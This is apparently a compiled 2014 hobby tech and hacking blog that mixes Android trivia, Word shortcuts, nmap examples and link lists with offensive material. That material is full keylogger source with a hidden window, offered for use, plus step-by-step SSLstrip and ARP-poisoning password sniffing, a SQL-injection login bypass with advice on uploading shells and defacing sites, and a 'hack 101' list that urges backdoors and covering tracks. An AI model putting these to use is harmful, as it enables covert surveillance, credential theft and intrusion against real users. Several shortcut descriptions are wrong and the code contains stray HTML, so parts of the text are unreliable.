"gPhone" as early as 2007 though Nexus
came out in
2010.
• Microsoft thought it would be a non-event:
Microsoft's Scott Horn, then head of the
Windows
Mobile marketing team, had told Engadget
after
Android's release, "I don't understand the
impact they
are going to have."
• Resolution scaling was introduced in
Version 1.6: The
ability to automatically scale images based
on display
size appeared in Donut, or Android 1.6,
paving the way
for the huge range of device form factors on
the Android
market today.
• There's an Android phone in space: A
British firm
launched a Nexus phone on Space, to control
a satellite
as part of an experiment and see how well
consumer-
grade electronics stand up to the rigors of
space.
• Every app you run on your Android phone
gets its own
virtual machine: Each active app on an
Android device
runs in its own Dalvik VM, which keeps it
safe and
separate from core functions. This improves
battery life
and boosts performance of the phone.
• The first official version code name was
NOT a
dessert: Google's Dan Morrill confirmed in
January that
the very first alpha version of Android
released to
internal developers was R2-D2.

Tuesday 5 August 2014

Microsoft Word shortcut keys

Ctrl + b : you can order your
favorite file by this command
ctrl + f : you can search for
some word
ctrl + s : save the work you've
done
ctrl + shift or right index
makes the writing go to the
left
alt + f4 : is useful to close the
windows
alt + esc you can move from
window to window
alt + tab : is very useful if
there are many windows open
you can choose the required
window
alt + shift : switch between
languages
f2 : very useful and fast to
change the name of a specific
file
Ctrl + C : Copy
Ctrl + X : Cut
Ctrl + V : Paste
Ctrl + Z : Undo
Ctrl + A : Select all
Ctrl + ESC : task list (Start)
Ctrl + Enter : Starting a new
page
Ctrl + END : Move to end of
file
Ctrl + F5 : Thumbnail file
window
Ctrl + F6 : move between files
Ctrl + F2 : preview the page
before printing
= + Ctrl : zoom in and out,
one degree
F4 : repeat the last process
Alt + Enter : repeat the last
process
Ctrl + Y : repeat the last
process
Shift + F10 : Bullets and
digital
F12 : Save As
Shift + F12 : Save the file
Ctrl + Home : the first
document
Ctrl + End : Latest document
Shift + F1 : information about
type of coordination
Ctrl + U : line under the text
Ctrl + F4 : Exit from the file
Ctrl + N : New File
Ctrl + H : Replacement
Ctrl + I : slash
Ctrl + K : Document Format
Ctrl + P : Print
Ctrl + O : open area
Alt + S : List Format
Alt + J : Help Menu
[+ Alt : List Table
] + Alt : Tools Menu
Alt + U : View menu
Alt + P : Edit Menu
Alt + L : file list
"+ Alt : window List
Alt + Q : modified procedure
Ctrl + E : Center text
Ctrl + F : Search
Ctrl + B : black line
Ctrl + Shift + P : font size
Ctrl + Shift + S : Style
Ctrl + D : line
Ctrl + Shift + K : character
conversion - Capital
Shift + F3 : character
conversion - Capital
Ctrl + Shift + L : point at the
beginning of the text
Ctrl + Alt + E : footnotes
numbered Romanian
Ctrl + Alt + R : Mark ®
Ctrl + Alt + T : Mark ™
Ctrl + Alt + C : Mark ©
Ctrl + Alt + I : preview the
page before printing
Shift + F7 : Thesaurus
Ctrl + Alt + F1 : System
Information
Ctrl + Alt + F2 : Open
Directories
Ctrl + J : resolving the text
from both sides
Ctrl + L : the beginning of the
text from the left side
Ctrl + Q : the beginning of the
text from the right side
Ctrl + E : Center text
Ctrl + M : changing the size of
the top paragraph
Shift + F5 : To return to the
position that you finished it
when you close the file
= + Ctrl + Alt : Customize
F3 : AutoText entry
F9 : Check fields
F10 : Move the framework to
open windows
F1 : Help
F5 : Jump to
F7 : Spelling
F8 : Select Zone

Why Programming For Hacking ???

Learn a programming language. You
shouldn't limit yourself to any particular
language, but there are a few guidelines.
C is the language the Unix was built with. It
(along with assembly language) teaches
something that's very important in hacking:
how memory works.
Python or Ruby are high-level, powerful
scripting languages that can be used to
automate various tasks.
Perl is a reasonable choice in this field as
well, while PHP is worth learning because the
majority of web applications use PHP.
Bash scripting is a must. That is how to
easily manipulate Unix/Linux systems—
writing scripts, which will do most of the job
for you.
Assembly language is a must-know. It is the
basic language that your processor
understands, and there are multiple
variations of it. At the end of the day, all
programs are eventually interpreted as
assembly. You can't truly exploit a program
if you don't know assembly.

What is Tabnabbing?

Tabnabbing is a computer exploit and
phishing attack, which persuades users
to submit their login details and
passwords to popular websites by
impersonating those sites and convincing
the user that the site is genuine. The
attack's name was coined in early 2010
by Aza Raskin, a security researcher
and design expert.
The attack takes advantage of user
trust and inattention to detail in
regard to tabs, and the ability of
modern web pages to rewrite tabs and
their contents a long time after the
page is loaded. Tabnabbing operates in
reverse of most phishing attacks in that
it doesn’t ask users to click on an
obfuscated link but instead loads a fake
page in one of the open tabs in your
browser.
The exploit employs scripts to rewrite a
page of average interest with an
impersonation of a well-known website,
when left unattended for some time. A
user who returns after a while and sees
the rewritten page may be induced to
believe the page is legitimate and enter
their login, password and other details
that will be used for improper purposes.
The attack can be made more likely to
succeed if the script checks for well
known Web sites the user has loaded in
the past or in other tabs, and loads a
simulation of the same sites. This attack
can be done even if JavaScript is
disabled, using the "meta refresh" meta
element, an HTML attribute used for
page redirection that causes a reload of
a specified new page after a given time
interval.
The NoScript extension for Mozilla
Firefox defends both from the
JavaScript-based and from the
scriptless attack, based on meta
refresh, by preventing inactive tabs

Sniffing password over network by cain and abel

Introduction
UNIX users often smugly assert that the best
free security tools support their platform
first, and Windows ports are often an
afterthought. They are usually right, but Cain
& Abel is a glaring exception. This Windows-
only password recovery tool handles an
enormous variety of tasks. It can recover
passwords by sniffing the network, cracking
encrypted passwords using Dictionary, Brute-
Force and Cryptanalysis attacks, recording
VoIP conversations, decoding scrambled
passwords, revealing password boxes,
uncovering cached passwords and analyzing
routing protocols.
We are going to explain Cain & Abel in
context to Man-in-the-middle attack.
Sniffing LAN passwords using Cain & Abel.
(Works only for ethernet netwoks)
>Run Cain and abel
>Now click on the sniffer tab, right click and
select Scan MAC Addresses.
>Check "All tests" and click OK. Cain & Abel
will start scanning the MAC addresses
>Click to ARP ( yellow symbol ) after
scanning the host then click to Plus Symbol
>Click to left side box of any IP. it
automatically comes right hand side box
>Pess the Ctrl or shift select all then click ok
>All the host in Idle postion then click to
yellow symbol to Start the poisoning
>now ARP Poisoning start in the network
>Check the logs. Click to passoword options

WEB PENTESTING-

web pentesting there
are many type of bugs in the website
some which is given below
1.sql injection-
this type of bug is for beginner there are lot
of the websites .for tat we can insert in the
input field following command like
' or '1'='1
in the username and password both aNd
after that u can bypass the cpanel of the
websites
and upload your vuln shelll and after that
you can use metasploit for shared server
hacking
if there is linux server is used then you can
root the server or symlink the particular
server.
2.SQLI-
these type of vulnerability in the database of
that websites.for attacking on that you can
use havij for windows machine(KIDDIES).if
you are work on linux then you can use
sqlmap for
datebase hacking if you are professional
hacker then you can use the browser side
query based
attack on that target website.Once you got
the admin and pass themn you can deface
thaT
by using shell like C99,R57 etc
3.XSS-
this is cross site scripting based attack on
that websites in which we can insert the
text on that target websites and which can be
reflected on that browser side or can we
stored '
on the database of website(server side)
4.dir traversal-
it is a type of bug in which there is sensitive
link is directly is open by url side
by browser
5. Remote code execution vulnerability-
A Remote Code Execution attack is a result of
either server side or client side security
weaknesses.
Vulnerable components may include libraries,
remote directories on a server that haven’t
been monitored, frameworks, and other
software modules that run on the basis of
authenticated user access. Applications that
use these components are always under
attack through things like scripts, malware,
and small command lines that extract
information.
some examples of that LFI,RFI,web dav
remote code execution,JCE exploit etc
6. DDOS-
DDoS, or Distributed Denial of Services is
where a server or a machine’s services are
made unavailable to its users.
it's usually agenda is temporarily interrupt or
completely take down a successful running
system.
DDoS attack could be sending tons of URL
requests to a website or a webpage in a very
small amount of time.
BOTNET is popularly used for that DDOS,BY
BOTNET we can connect many clients on
that .
after that we can flood on that websites.

how to use SSLstrip in kali linux:

what is sslstrip-
sslstrip is a MITM attack tool that allows to
attacker manipulates the traffic & capture
data such as user name and password.
how it works for-
it works for converting https request into
basic http request.
Step-1
for enabling ipforwarding so our computer
can route traffic
echo 1 > /proc/sys/net/ipv4/ip_forward
Step-2
now we need configure ip table so that our
computer can redirect traffic
iptables -t nat -A PREROUTING -p tcp --
destination-port 80 -j REDIRECT --to-ports
8080
Step-3
for start ARP spoof
arpspoof -i <interface> -t <target ip> -r
<gateway ip>
Step-4
so now we need sslstrip in a new terminal
(don't close previous terminal)
sslstrip -l 8080
Note-you can done arp spoofing by ettercap

How Your Passwords Are Stored on the Internet

*********** Passwords ********** 1
How Your Passwords Are Stored on the
Internet
here are a number of ways a site can store
your password, and some are considerably
more secure than others. Here's a quick
rundown of the most popular methods, and
what they mean for the security of your
data.
Method One: Plain Text Passwords
How It Works: The simplest way a site can
store your password is in plain text. That
means somewhere on a their server, there
exists a database with your username and
password in it in a human-readable form
(that is, if your password is testing123, it is
stored in the database as testing123). When
you enter your credentials on the site, it
checks them against the database to see if
they match. This is the worst possible
method, in security terms, and most
reputable web sites do not store passwords
in plain text. If someone hacks this database,
everyone's password is immediately
compromised.
Does My Strong Password Matter? No way.
No matter how long or strong your password
may be, if it's stored in plain text and the
site gets hacked, your password is easily
accessible to anyone, no work required. It
still matters in terms of hiding your
passwords from, say, your friends, or others
that could easily guess it, but it won't make
any difference if the site gets hacked.1
Method Two: Basic Password Encryption
How It Works: To add more protection to
your password than plain text provides, most
sites encrypt your password before they
store it on their servers. Encryption, for
those of you that don't know, uses a special
key to turn your password into a random
string of text. If a hacker were to get hold of
this random string of text, they wouldn't be
able to log into your account unless they
also had the key, which they could then use
to decrypt it.
The problem is, the key is often stored on
the very same server that the passwords are,
so if the servers get hacked, a hacker doesn't
have to do much work to decrypt all the
passwords, which means this method is still
wildly insecure.
Does My Strong Password Matter? No. Since
it's easy to decrypt the password database
with a key, your strong password won't make
a difference here either. Again: this is in
terms of the site getting hacked; if you have
a nosy friend or family member rooting
through your stuff, a strong password can
help keep them from guessing it.

Sunday 3 August 2014

The Nmap

The Nmap aka Network Mapper is an open
source and a very versatile tool for Network
administrators. Nmap is used for exploring
networks, perform security scans, network
audit and finding open ports on remote
machine. It scans for Live hosts, Operating
systems, packet filters and open ports
running on remote hosts.
Scan a System with Hostname and IP Address
1.Scan using Hostname
nmap server2.tecmint.com
2.Scan using IP Address
nmap 192.168.0.101
3.Scan using “-v” option ( “-v” option is
giving more detailed information about the
remote machine. )
map -v server2.tecmint.com
4.Scan Multiple Hosts
map 192.168.0.101 192.168.0.102
192.168.0.103
5.Scan a whole Subnet
nmap 192.168.0.*
6.Scan Multiple Servers using last octet of IP
address
nmap 192.168.0.101,102,103
7.Scan an IP Address Range
nmap 192.168.0.101-110
8.Scan Network Excluding Remote Hosts
nmap 192.168.0.* --exclude 192.168.0.100
9.Scan OS information and Traceroute
nmap -A 192.168.0.101
10.Enable OS Detection with Nmap
nmap -O server2.tecmint.com
11.Scan a Host to Detect Firewall
nmap -sA 192.168.0.101
12.Scan a Host to check its protected by
Firewall
nmap -PN 192.168.0.101
13.Find out Live hosts in a Network
nmap -sP 192.168.0.*
14.Perform a Fast Scan
nmap -F 192.168.0.101
15.Find Nmap version
nmap -V
16.Scan Ports Consecutively
nmap -r 192.168.0.101
17.Print Host interfaces and Routes
nmap --iflist
18.Scan for specific Port
nmap -p 80 server2.tecmint.com
19.Scan a TCP Port
nmap -p T:8888,80 server2.tecmint.com
20.Scan a UDP Port
nmap -sU 53 server2.tecmint.com
21.Scan Multiple Ports
nmap -p 80,443 192.168.0.101
22.Scan Ports by Network Range
nmap -p 80-160 192.168.0.101
23.Find Host Services version Numbers
nmap -sV 192.168.0.101
24.Scan remote hosts using TCP ACK (PA) and
TCP Syn (PS)
nmap -PS 192.168.0.101
25.Scan Remote host for specific ports with
TCP ACK
nmap -PA -p 22,80 192.168.0.101
26.Scan Remote host for specific ports with
TCP Syn
nmap -PS -p 22,80 192.168.0.101
27.Perform a stealthy Scan
nmap -sS 192.168.0.101
28.Check most commonly used Ports with
TCP Syn
nmap -sT 192.168.0.101
29.Perform a tcp null scan to fool a firewall
nmap -sN 192.168.0.101
Download link :- http://nmap.org/
download.html

how to hack a website/computer 101

step 1 scan your target
step 2 find open ports that u can exploit
step 3 exploit them!
step 4 now you are in the system! fuck shit
up
step 5 create a backdoor so you can easy
acess again
step 6 leave no trace of you the more silent
you get the more your able to hear its better to wait a while and see if you can acess something else (like fb/email
***** you are responsible for what u do hacking is illegal.Good luck:)

Saturday 2 August 2014

Top Server And Admin Applications For Android And IPhone: android-vs-ios

No matter what is the nature of your work,
whether you are a webmaster, server
administrator or an IT professional, the
ability is to deal with your admin tasks and
the server is your utmost priority. In this
article, we are going to discuss the top five
server and admin applications that is suitable
to your iPhone, and Android mobile gadgets.
1. AndFTP
For those who are not yet familiar about
AndFTP it serves as an SCP, FTP, and SFTP
and FTPS client. Moreover, AndFTP let the
user to handle number of FTP configurations;
as well it provides features like download
and upload and sharing management. As well
AndFTP allows the user to delete, rename,
open, or update permissions, and also to run
custom commands.
2. ConnectBot
ConnectBot act as a Secure Shell client
intended for Android users, as well it creates
secure connection through using a shell even
the gadget is in the remote distance to
transmit files and data back and forth to
your phone. Furthermore, ConnectBot let the
user to handle numbers ofSSH sessions, as
well allow them to copy and paste between
other applications, and to build protected
tunnels.
Jack Wallen an award winning writer of
Linux.com stated that ConnectBot is a must
have app, in fact he recommend this app to
the Linux admin who are using Android
phone.
3. ServerMonitor
ServerMonitor is an app intended for iPhone
users, it uses SSH protocol to link machines
remotely to assists with your workstation and
server monitoring requirements. The multi-
protocol supports include the following: FTP,
SMTP, HTTP, IMAP, MySQL, HTTPS, DNS,
POP3, Ping and SSH.
Although there is no much review regarding
this app but the general response seems to
be optimistic. Based on the feedback from
the users one thing they want to be added in
this app on the next update is the ability to
view all list of running processes and to view
how much memory they occupy.
4. iSSH – SSH / VNC Console
The iSSH – SSH / VNC Console for iPhone is
an SSH and Telnet emulator that is fully
featured with ANSI, VT102, VT100, and
VT220 incorporated with tunneled X server,
RDP client and VNC client. As well this app
has the ability to carry simultaneous
connections with total terminal
compatibility, intuitive user interface, and
configurable macro and key options.
5. Network Utility
Network Utility let the user to check the
status of their server or websites through
their Apple device or iPhone anywhere.
Network Utility is fully featured with TCP/IP
Port Scan, ping (ICMP Echo), IP address
information, Whois Query, GeoIP Lookup,
and more.
For me this another iPhone app that seems
to be gathering mixed reviews. Some user
approved its efficiency and its user
friendliness, but other user rising complaint
that this app causes their device to freeze up
that can only be fixed through restarting the
device. Users as well object about the
absence of subnet scans. The decision is still
out on this app. But the best thing we need
to do is to try this and experience how it
holds up.

Top Server And Admin Applications For Android And IPhone: android-vs-ios

Ways To Be Anonymous Online

Want to be anonymous online to view
blocked websites, protect your self from
hackers or want to hack some one and stay
un-traced?. In the following post i will
explain 4 easy ways by which you can stay
anonymous online!
1. Using Proxies
A proxy is an address ( IP address) of a
Server (proxy server) that is placed between
your computer and the Internet The
advantage ofa proxy is that your real IP
address is Hidden so when you hack your
giving the IP address ofthe proxy sever and
not your real IP address Same way if your a
normal Internet user the hacker won't get
your real IP but the IP of the proxy
server.You can use it to enter site or forum
that you areIP is banned. To know more
about proxies les me know above this post
and I will post a full tutotial about it.
2. Using Tor
Tor-proxy is a free proxy-server service that
Internet users can useto hide their IP address
while surfing the Web. Tor (The Onion
Router) is free software for enabling online
anonymity. Tor directs Internet traffic
through a free, worldwide volunteer network
consisting of more than three thousand
relays to conceal auser's location or usage
from anyone. I have written a complete How
to guide on how to use tor - just let me know
if you need it
3. SSH Tunneling
SSH tunnel is an encrypted tunnel created
through an SSH protocol connection. SSH
tunnels may be used to tunnel unencrypted
trafficover a network through an encrypted
channel.In easy language,you can surf net
withoutbeing monitored and even surf
blocked sites too. To know more about SSH
and SSH tunneling let me know if you would
like to read: SSH tunneling guide.
4. Using VPN
Virtual Private Network. Basically it’s a
private network which lets users to connect
to other users orremote sites using a public
network usually internet. It uses “virtual”
connections routed through the Internet
from the company’s private network to the
remote site or employee instead of physical
connections. In short, it is private network
constructed within a public network
infrastructure,such as the global Internet.
The Biggest difference between proxy and
VPN is everything in a VPN is encrypted
which gives an additional layer of security.
There are some paid Andfree VPN services.

Tunneling protocol

Computer networks use a tunneling protocol
when one network protocol (the delivery
protocol) encapsulates a different payload
protocol. By using tunneling one can (for
example) carry a payload over an
incompatible delivery-network, or provide a
secure path through an untrusted network.
Tunneling typically contrasts with a layered
protocol model such as those of OSI or TCP/
IP. Typically, the delivery protocol operates
at an equal or higher level in the model than
does the payload protocol.
To understand a particular protocol stack,
network engineers must understand both the
payload and delivery protocol sets.
As an example of network layer over network
layer, Generic Routing Encapsulation (GRE), a
protocol running over IP (IP Protocol
Number 47), often serves to carry IP packets,
with RFC 1918 private addresses, over the
Internet using delivery packets with public IP
addresses. In this case, the delivery and
payload protocols are compatible, but the
payload addresses are incompatible with
those of the delivery network.
In contrast, an IP payload might believe it
sees a data link layer delivery when it is
carried inside the Layer 2 Tunneling Protocol
(L2TP), which appears to the payload
mechanism as a protocol of the data link
layer. L2TP, however, actually runs over the
transport layer using User Datagram Protocol
(UDP) over IP. The IP in the delivery protocol
could run over any data-link protocol from
IEEE 802.2 over IEEE 802.3 (i.e., standards-
based Ethernet) to the Point-to-Point
Protocol (PPP) over a dialup modem link.
Tunneling protocols may use data encryption
to transport insecure payload protocols over
a public network (such as the Internet),
thereby providing VPN functionality. IPsec
has an end-to-end Transport Mode, but can
also operate in a tunneling mode through a
trusted security gateway.
Secure Shell tunneling[edit]
A Secure Shell (SSH) tunnel consists of an
encrypted tunnel created through an SSH
protocol connection. Users may set up SSH
tunnels to transfer unencrypted traffic over a
network through an encrypted channel. For
example, Microsoft Windows machines can
share files using the Server Message Block
(SMB) protocol, a non-encrypted protocol. If
one were to mount a Microsoft Windows file-
system remotely through the Internet,
someone snooping on the connection could
see transferred files. To mount the Windows
file-system securely, one can establish a SSH
tunnel that routes all SMB traffic to the
remote fileserver through an encrypted
channel. Even though the SMB protocol itself
contains no encryption, the encrypted SSH
channel through which it travels offers
security.
Reverse ssh tunnel
To set up an SSH tunnel, one configures an
SSH client to forward a specified local port
to a port on the remote machine. Once the
SSH tunnel has been established, the user
can connect to the specified local port to
access the network service. The local port
need not have the same port number as the
remote port.
SSH tunnels provide a means to bypass
firewalls that prohibit certain Internet
services – so long as a site allows outgoing
connections. For example, an organization
may prohibit a user from accessing Internet
web pages (port 80) directly without passing
through the organization's proxy filter (which
provides the organization with a means of
monitoring and controlling what the user
sees through the web). But users may not
wish to have their web traffic monitored or
blocked by the organization's proxy filter. If
users can connect to an external SSH server,
they can create a SSH tunnel to forward a
given port on their local machine to port 80
on a remote web-server. To access the
remote web-server, users would point their
browser to the local port at http://localhost/
Some SSH clients support dynamic port
forwarding that allows the user to create a
SOCKS 4/5 proxy. In this case users can
configure their applications to use their local
SOCKS proxy server. This gives more
flexibility than creating a SSH tunnel to a
single port as previously described. SOCKS
can free the user from the limitations of
connecting only to a predefined remote port
and server. If an application doesn't support
SOCKS, one can use a "socksifier" to redirect
the application to the local SOCKS proxy
server. Some "socksifiers", such as Proxycap,
support SSH directly, thus avoiding the need
for a SSH client.

HOW TO CREATE KEYLOGGER USING C++.?

Any Idea about keylogger..?
Keylogger is a software program that is used
to monitor and log each of the keys a user
types into a computer keyboard.In this way
keylogger steals user information such as
passwords and sends it to the Hacker.
There are many Key loggers in the market ,
but never mind, we are programmers and we
develop our version of the tool.
copy the below code, compile and run it.
Once you run the program you can see the
“log” file created along with the executable
ones
CODE :
# include <iostream>
#include <fstream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_<span
class="la4l7p" id="la4l7p_5">HOME</
span>)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke ==
110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClas
s", NULL);
ShowWindow(Stealth,0);
}
Test it on your PC and have fun

Useful Website 2

ctrlq.org/screenshots – for capturing
screenshots of web pages on mobile and
desktops.
dictation.io – online voice recognition in the
browser itself.
Most Useful Websiteszerodollarmovies.com –
find full-length movies on YouTube.
screenr.com – record movies of your
desktop and send them straight to YouTube.
goo.gl – shorten long URLs and convert URLs
into QR codes.
unfurlr.come – find the original URL that’s
hiding behind a short URL.
qClock – find the local time of a city using
Google Maps.
copypastecharacter.com – copy special
characters that aren’t on your keyboard.
codeacademy.com – the best place to learn
coding online.
lovelycharts.com – create flowcharts,
network diagrams, sitemaps, etc.
iconfinder.com – find icons of all sizes.
office.com – download templates, clipart and
images for your Office documents.
followupthen.com – the easiest way to setup
email reminders.
jotti.org – scan any suspicious file or email
attachment for viruses.
wolframalpha.com – gets answers directly
without searching – see more wolfram tips.
printwhatyoulike.com – print web pages
without the clutter.
ctrlq.save – save online files to Dropbox or
Google Drive directly.
ctrql.rss – a search engine for RSS feeds.
e.ggtimer.com – a simple online timer for
your daily needs.
coralcdn.org – if a site is down due to heavy
traffic, try accessing it through coral CDN.
random.org – pick random numbers, flip
coins, and more.
pdfescape.com – lets you can quickly edit
PDFs in the browser itself.
tubemogul.com – simultaneously upload
videos to YouTube and other video sites.
scr.im – share you email address online
without worrying about spam.
spypig.com – now get read receipts for your
email.
myfonts.com/WhatTheFont – quickly
determine the font name from an image.
google.com/webfonts – a good collection of
open source fonts.
regex.info – find data hidden in your
photographs – see more EXIF tools.
livestream.com – broadcast events live over
the web, including your desktop screen.
iwantmyname.com – helps you search
domains across all TLDs.
homestyler.com – design from scratch or re-
model your home in 3d.
join.me – share you screen with anyone over
the web.
onlineocr.net – recognize text from scanned
PDFs – see other OCR tools.
flightstats.com – Track flight status at
airports worldwide.
wetransfer.com – for sharing really big files
online.
hundredzeros.com – the site lets you
download free Kindle books.
polishmywriting.com – check your writing
for spelling or grammatical errors.
marker.to – easily highlight the important
parts of a web page for sharing.
typewith.me – work on the same document
with multiple people.
whichdateworks.com – planning an event?
find a date that works for all.
everytimezone.com – a less confusing view
of the world time zones.
gtmetrix.com – the perfect tool for
measuring your site performance online.
noteflight.com – print music sheets, write
your own music online (review).
imo.im – chat with your buddies on Skype,
Facebook, Google Talk, etc. from one place.
translate.google.com – translate web pages,
PDFs and Office documents.
kleki.com – create paintings and sketches
with a wide variety of brushes.
similarsites.com – discover new sites that are
similar to what you like already.
wordle.net – quick summarize long pieces of
text with tag clouds.
bubbl.us – create mind-maps, brainstorm
ideas in the browser.
kuler.adobe.com – get color ideas, also
extract colors from photographs.
liveshare.com – share your photos in an
album instantly.
lmgtfy.com – when your friends are too lazy
to use Google on their own.
midomi.com – when you need to find the
name of a song.
google.com/history – see your past searches,
also among most important Google URLs
bing.com/images – automatically find
perfectly-sized wallpapers for mobiles.
faxzero.com – send an online fax for free –
see more fax services.
feedmyinbox.com – get RSS feeds as an email
newsletter.
ge.tt – qiuckly send a file to someone, they
can even preview it before downloading.
pipebytes.com – transfer files of any size
without uploading to a third-party server.
tinychat.com – setup a private chat room in
micro-seconds.
privnote.com – create text notes that will
self-destruct after being read.
boxoh.com – track the status of any
shipment on Google Maps – alternative.
mondrian.io – create vector drawings in the
browser
draw.io – create diagrams and flowcharts in
the browser, export your drawings to Google
Drive and Dropbox.
downforeveryoneorjustme.com – find if your
favorite website is offline or not?
ewhois.com – find the other websites of a
person with reverse Analytics lookup.
whoishostingthis.com – find the web host of
any website.
labnol.org – software tutorials and how-to
guides.
disposablewebpage.com – create a temporary
web page that self-destruct.
urbandictionary.com – find definitions of
slangs and informal words.
seatguru.com – consult this site before
choosing a seat for your next flight.
unsplash.com – download images absolutely
free.
zoom.it – view very high-resolution images
in your browser without scrolling.
scribblemaps.com – create custom Google
Maps easily.
alertful.com – quickly setup email reminders
for important events.
picmonkey.com – Picnik is offline but
PicMonkey is an even better image editor.
formspring.me – you can ask or answer
personal questions here.
sumopaint.com – an excellent layer-based
online image editor.
snopes.com – find if that email offer you
received is real or just another scam.
typingweb.com – master touch-typing with
these practice sessions.
mailvu.com – send video emails to anyone
using your web cam.
timerime.com – create timelines with audio,
video and images.
stupeflix.com – make a movie out of your
images, audio and video clips.
safeweb.norton.com – check the trust level
of any website.
teuxdeux.com – a beautiful to-do app that
looks like your paper dairy.
deadurl.com – you’ll need this when your
bookmarked web pages are deleted.
minutes.io – quickly capture effective notes
during meetings.
youtube.com/leanback – Watch YouTube
channels in TV mode.
youtube.com/disco – quickly create a video
playlist of your favorite artist.
talltweets.com – Send tweets longer than 140
characters.
pancake .io – create a free and simple
website using your Dropbox account.
builtwith.com – find the technology stack to
know everything about a website.
woorank.com – research a website from the
SEO perspective.
mixlr.com – broadcast live audio over the
web.
radbox.me – bookmark online videos and
watch them later (review).
tagmydoc.com – add QR codes to your
documents and presentations (review).
notes.io – the easiest way to write short text
notes in the browser.
ctrlq.org/html-mail – send rich-text mails to
anyone, anonymously.
fiverr.com – hire people to do little things
for $5.
otixo.com – easily manage your online files
on Dropbox, Google Docs, etc.
ifttt.com – create a connection between all
your online accounts.

Internet Useful Website

virustotal.com – scan any suspicious file or
email attachment for viruses.
isnsfw.com – when you wish to share a NSFW
page but with a warning.
truveo.com – the best place for searching
web videos.
tabbloid.com – your favorite blogs delivered
as PDFs.
warrick.cs.odu.edu – you’ll need this when
your bookmarked web pages are deleted.
tempalias.com – generate temporary email
aliases, better than disposable email.
whisperbot.com – send an email without
using your own account.
errorlevelanalysis.com – find whether a
photo is real or a photoshopped one.
google.com/dictionary – get word meanings,
pronunciations and usage examples.
wobzip.org – unzip your compressed files
online.
namemytune.com – when you need to find
the name of a song.
snapask.com – use email on your phone to
find sports scores, read Wikipedia, etc.
pastebin.com – the site has been blocked in
India.
encrypted.google.com – Google now
redirects all logged-in users to the https
version of google.com by default so this is
no longer necessary.
bounceapp.com – replace this with a version
that works on mobile.
dabbleboard.com – a online virtual
whiteboard that will shut down in August
2012.
chipin.com – helps you raise funds online for
an event or a cause (closed).

Types of attacks in computing

1.Dictionary attack :-
A dictionary attack uses a targeted technique
of successively trying all the words in an
exhaustive list called a dictionary (from a
pre-arranged list of values).
2. Brute Force Attack :-
In contrast with a brute force attack, where
a large proportion key space is searched
systematically, a dictionary attack tries only
those possibilities which are most likely to
succeed, typically derived from a list of
words for example a dictionary (hence the
phrase dictionary attack).
3. Hybrid Attack :-
It works like a dictionary attack, but adds
some numbers and symbols to the words
from the dictionary and tries to crack the
password.
4. Syllable Attack :-
It is the combination of both brute force
attack and the the dictionary attack.
5. Rule-Based Attack :-
This attack is used when the attacker gets
some information about the password

Router passwords Finder App

Description
Router Passwords Finder app provides quick
access for technicians to default passwords
used on routers, default web logins, CCTV
systems and other electronic devices.
Using this app, you can:
- Browse large database of router
manufacturers.
- Search for router manufacturers.
- See list of all models of router
manufacturers.
- Copy information, share, add to bookmark
model.
https://play.google.com/store/apps/details?
id=com.viddic.routerpasswords
Alternative Websites
http://www.routerpasswords .com
http://portforward. com/default_username
_password/

Router passwords Finder App

How to become an ethical hacker

An essential guide to
becoming an ethical hacker
I often get a number of people ask for
guidance about how they can become an
ethical hacker. I also receive even more
requests about how to become a black hat
hacker. The latter requests are ignored. below
is a definition of an ethical hacker
Ethical hacker
noun
1. a person who hacks into a computer
network in order to test or evaluate its
security, rather than with malicious or
criminal intent.
So if you want to be an ethical hacker the
truth is there is no easy method to become a
skilled hacker …… it’s easy to be a script kiddie
and load up Armitage or Fast-track and fire
every exploit known to man at a target. But
what’s the point at firing Linux exploits at a
Windows box!.
You need essential prerequisite knowledge
If you want to get into the IT security world
as a white hat you must be competent in the
following areas:
Networking
Programming
Databases
Once you have a fairly good knowledge of the
above points THEN it would a good idea to
learn about hacking. So now you have a good
understanding of the fundamentals of IT, you
can now understand how to break some of the
underlying vulnerabilities within computer
architecture. The following activities should
help you with this:
Read books about hacking (Here are some
good examples of some) -
Hacking: The Art of Exploitation, 2nd
Edition
The Basics of Hacking and Penetration
Testing: Ethical Hacking and Penetration
Testing Made Easy (Syngress Basics Series)
Metasploit: The Penetration Tester’s Guide
BackTrack 5 Wireless Penetration Testing
Beginner’s Guide
CEH Certified Ethical Hacker All-in-One
Exam Guide
Google Hacking for Penetration Testers
The Web Application Hacker’s Handbook:
Finding and Exploiting Security Flaws
Undertake various online courses
CEH
OSCP
SANS SEC560
Communicate and follow other fellow IT
security enthusiasts through the following
mediums
Facebook (https://www.facebook.com/
pages/Hacking-News-
Tutorials/252350961471136 )
Google+
Twitter
Self learn by reading and watching online
tutorials
www.video.latesthackingnews.com
www.securitytube.net
youtube.com
